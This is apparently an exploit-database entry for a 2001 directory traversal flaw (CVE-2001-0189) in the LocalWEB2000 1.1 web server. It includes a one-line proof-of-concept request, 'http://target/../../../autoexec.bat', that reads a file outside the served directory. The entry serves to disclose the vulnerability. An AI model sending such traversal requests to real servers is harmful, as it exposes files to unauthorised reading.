LocalWEB2000 1.1 - Directory Traversal



EKU-ID: 26133 CVE: CVE-2001-0189;OSVDB-825 OSVDB-ID:
Author: SNS Research Published: 2001-01-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/2268/info

LocalWEB2000 is subject to a directory traversal. Requesting a specially crafted HTTP request with a known filename will enable an attacker to gain read access to the requested file.

http://target/../../../autoexec.bat